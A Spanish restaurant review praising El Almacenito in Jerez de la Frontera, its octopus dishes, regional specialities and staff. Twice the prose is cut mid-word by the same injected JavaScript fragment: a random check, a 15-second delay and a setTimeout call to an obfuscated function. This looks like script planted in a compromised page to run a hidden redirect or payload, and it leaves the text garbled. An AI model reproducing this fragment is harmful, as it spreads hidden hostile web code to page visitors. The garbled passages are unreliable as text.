El Almacenito: “Un recorrido por nuestra gastronomía”

almacenito2Hoy he tenido el gusto de volver a comer en el Mesón restaurante El Almacenito, dónde me siento como en casa. Actualmente regentado por mi amigo y conocido futbolista jerezano José Vega, del cual, sólo los más cercanos tenemos conocimiento de que además de su familia y el fútbol, tiene otra gran pasión: la cocina.

No es extraño verlo dentro de la cocina echandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando una mano a su actual jefe de cocina, Juan Molida, del cual me he llevado una magnífica impresión, ya que ha conseguido fusionar la cocina tradicional, con un toque de innovación, que hace que la simple presentación de sus platos sea espectacular.

Entre los dos han conseguido que al leer la carta de éste restaurante uno tenga serios problemas para saber que elegir a la hora de comer, ya que quisieras probar todos los platos. Pero personalmente, me quedo con su pulpo a la plancha con crema de patatas, producto del cual se han hecho especialistas y aquellas personas que tengan el placer de visitarlos, podrán disfrutarlo de diferentes maneras: en ensaladilla, brocheta de pulpo con salmorejo, pulpo en tempura con crema de ajos, revuelto de pulpo y cebolla o pulpo a la gallega.

almacenito3Gracias a la larga andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andadura de José en el mundo del futbol, ha tenido la oportunidad de disfrutar de la gastronomía de muchas ciudades de España y ha introducido en la cocina de su restaurante algunos de los platos que más le han gustado a lo largo de sus viajes. Como por ejemplo, el saquito crujiente de gambas, el cual probó en Elche, los cogollos a la cordobesa, el famoso salmorejo cordobés, el revuelto de cecina de León, de León también hay que destacar las carnes ecológicas del Valle del Esla, otro auténtico espectáculo al paladar y así un largo etc.

Inevitable no hablar de su jamón, Martin Hierro, denominación de origen Jabugo; es de los que producen ese picor tan maravilloso en la garganta, un placer al paladar.

Y de lo que no nos podemos olvidar, es del exquisito trato del personal con todos sus clientes, que hacen que uno se sienta como en casa, en un ambiente relajado y distendido.

El restaurante cuenta con una magnífica terraza dónde poder disfrutar de una buen almuerzo o cena al aire libre, dependiendo de la época del año, un magnífico salón comedor y desde hace muy poco tiempo, un amplio espacio dónde se podrán celebrar comidas de empresas, reuniones familiares o cualquier evento que precise un espacio más amplio.

Un lugar que no se puede dejar de visitar si vienen a la preciosa ciudad de Jerez de la Frontera.

El restaurante está situado en:

Av/Europa C/Estaño nº 10

Tlf: 616995990